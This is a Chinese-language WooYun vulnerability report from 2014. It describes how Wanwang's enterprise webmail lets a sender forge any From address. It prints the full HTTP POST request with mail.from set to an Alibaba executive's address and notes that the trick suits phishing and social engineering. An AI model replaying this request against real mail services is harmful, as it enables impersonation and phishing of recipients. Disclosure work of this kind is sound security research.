漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-069569
漏洞标题:万网企业邮箱任意发件地址伪造“漏洞”
相关厂商:万网
漏洞作者: unic02n
提交时间:2014-07-24 17:36
修复时间:2014-07-29 17:38
公开时间:2014-07-29 17:38
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-24: 细节已通知厂商并且等待厂商处理中
2014-07-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
万网企业邮箱,存在任意发件地址伪造“漏洞”。
详细说明:
这个算不算厂商漏洞呢?
有人说不算厂商漏洞,因为可以任意搭建自己的服务器去发送类似的邮件。不过,我认为这属于漏洞。
我使用你们的业务,收费的业务。我居然可以收到一个伪造的邮件,这不算漏洞么?服务方不该负责任么?
具体算不算漏洞,大家可以一起来看看。
漏洞证明:
企业邮箱(非新版),发送邮件,其实是一个post ,内容如下:
POST /mailview/mailWrite/do_send.htm HTTP/1.1
Host: mail.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6003
relatedViewDate=&asToken=&email=&fromMaillist=&_sessionToken=token&_formResubmitToken=token&directShow=&mail.mailId=&mail.oldMailId=&oldMailIds=&mail.mailTimingSend=&mail.separatedSend=0&mail.tos=%E9%83%91%E6%B6%9B%3Ctarget@target.com%3E&mail.ccs=&mail.bcs=&mail.subject=hello,world&mail.content=123123&mail.textContent=222222&mail.isPriority=&mail.isNotification=&folderId=&attachs=&writeMail=1&firstSave=1&totalSpace=600M&replyOldMailid=&isReplyedMail=&relayOldMailid=&isRelayedMail=&remainSpaceByte=&totalSpaceByte=&mail.isDraft=&mail.textType=2&mail.envId=&mail.messageId=&mail.references=&mail.inReplyTo=&netdiskFileInfo=&mail.from=mayun@alibaba-inc.com&mail.extendType=1
mail.tos :目标
mail.from :发送邮件地址
修改mail.from 即可伪造任意的发件地址。其实操作是很简单的。
实际效果呢?
同域内的伪造邮件,肯定很爽的,完全没有任何瑕疵。钓鱼社工什么的,那是杠杠的。
跨域的时候,如果使用web收发邮件,则会出现代发字样,而使用foxmail 的客户端则不会有代发字样。如下:
鉴于当前客户端收发的比例,此处的小瑕疵算是可以忽略吧。
修复方案:
不知道,你们自己看吧,
你们觉得不是漏洞那就继续留着吧,
版权声明:转载请注明来源 unic02n@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-07-29 17:38
厂商回复:
最新状态:
暂无